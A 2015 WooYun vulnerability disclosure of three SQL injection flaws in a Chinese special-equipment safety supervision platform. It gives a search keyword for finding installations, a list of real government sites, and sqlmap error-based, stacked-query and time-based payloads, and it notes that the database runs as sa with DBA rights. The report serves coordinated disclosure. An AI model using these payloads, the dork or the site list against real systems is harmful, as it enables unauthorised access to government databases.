当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099564

漏洞标题:某特种设备安全平台SQL注入漏洞三处

相关厂商:国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-03-09 10:22

修复时间:2015-06-11 15:20

公开时间:2015-06-11 15:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-09: 细节已通知厂商并且等待厂商处理中
2015-03-13: 厂商已经确认,细节仅向厂商公开
2015-03-16: 细节向第三方安全合作伙伴开放
2015-05-07: 细节向核心白帽子及相关领域专家公开
2015-05-17: 细节向普通白帽子公开
2015-05-27: 细节向实习白帽子公开
2015-06-11: 细节向公众公开

简要描述:

某特种设备安全平台SQL注入漏洞三处

详细说明:

系统名称:特种设备安全监察动态监管系统
系统结构:JSP+MSSQL
注入漏洞一:
漏洞文件:select_result.jsp
POST注入参数:SFZ_ID
注入漏洞二:select_result.jsp
POST注入参数:PXBID
注入漏洞三:漏洞文件:select_result.jsp
POST注入参数:NAME
算是同一文件下,三个不同的参数过滤不严格导致的注入漏洞

漏洞证明:

关键字:inurl:comment_info.jsp?sslm=

1.png


部分案例:
广西特种设备监察网:http://tzsb.gxqts.gov.cn/index.jsp
海南特种设备网:http://www.hntsw.gov.cn/select_result.jsp
福建省特种设备协会:http://www.fjase.com/index.jsp
南京市特种设备安全监察动态监管系统:http://58.213.147.216/
黑龙江特种设备安全监察网:http://www.hljts.gov.cn/index.jsp
陕西特种设备监察网:http://www.sxtsaj.com/index.jsp
江西特种设备监察网:http://111.75.211.4/index.jsp
等等
漏洞验证:
SQL注入一:
以:http://www.sxtsaj.com/ry_sldjb_Action.do;jsessionid=2A929079C721DF160922512CD28B3A81为例
参数SFZ_ID

Place: POST
Parameter: SFZ_ID
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: TASK=select_submit_web&SFZ_ID=666666' AND 7773=CONVERT(INT,(CHAR(58
) CHAR(97) CHAR(111) CHAR(102) CHAR(58) (SELECT (CASE WHEN (7773=7773) THEN CHAR
(49) ELSE CHAR(48) END)) CHAR(58) CHAR(119) CHAR(114) CHAR(121) CHAR(58))) AND '
NvOl'='NvOl&PXBID=SN1602&NAME=666666
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: TASK=select_submit_web&SFZ_ID=666666'; WAITFOR DELAY '0:0:5'--&PXBI
D=SN1602&NAME=666666
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: TASK=select_submit_web&SFZ_ID=666666' WAITFOR DELAY '0:0:5'--&PXBID
=SN1602&NAME=666666


1.png


数据库信息:

1.png


注入二:
参数:PXBID
http://www.sxtsaj.com/ry_sldjb_Action.do;jsessionid=2A929079C721DF160922512CD28B3A81

Place: POST
Parameter: PXBID
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: TASK=select_submit_web&SFZ_ID=666666&PXBID=SN1602' AND 7980=CONVERT
(INT,(CHAR(58) CHAR(97) CHAR(111) CHAR(102) CHAR(58) (SELECT (CASE WHEN (7980=79
80) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(119) CHAR(114) CHAR(121) CHA
R(58))) AND 'atyr'='atyr&NAME=666666
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: TASK=select_submit_web&SFZ_ID=666666&PXBID=SN1602'; WAITFOR DELAY '
0:0:5'--&NAME=666666
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: TASK=select_submit_web&SFZ_ID=666666&PXBID=SN1602' WAITFOR DELAY '0
:0:5'--&NAME=666666
---


1.png


当前用户sa

1.png


注入三:
http://www.sxtsaj.com/ry_sldjb_Action.do;jsessionid=2A929079C721DF160922512CD28B3A81
参数:NAME

Place: POST
Parameter: NAME
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: TASK=select_submit_web&SFZ_ID=666666&PXBID=SN1602&NAME=666666' AND
2232=CONVERT(INT,(CHAR(58) CHAR(97) CHAR(111) CHAR(102) CHAR(58) (SELECT (CASE W
HEN (2232=2232) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(119) CHAR(114) C
HAR(121) CHAR(58))) AND 'wnnd'='wnnd
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: TASK=select_submit_web&SFZ_ID=666666&PXBID=SN1602&NAME=666666'; WAI
TFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: TASK=select_submit_web&SFZ_ID=666666&PXBID=SN1602&NAME=666666' WAIT
FOR DELAY '0:0:5'--
---


1.png


DBA权限:

1.png


其他如上!

修复方案:

多参数过滤。。。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-03-13 15:18

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报。

最新状态:

暂无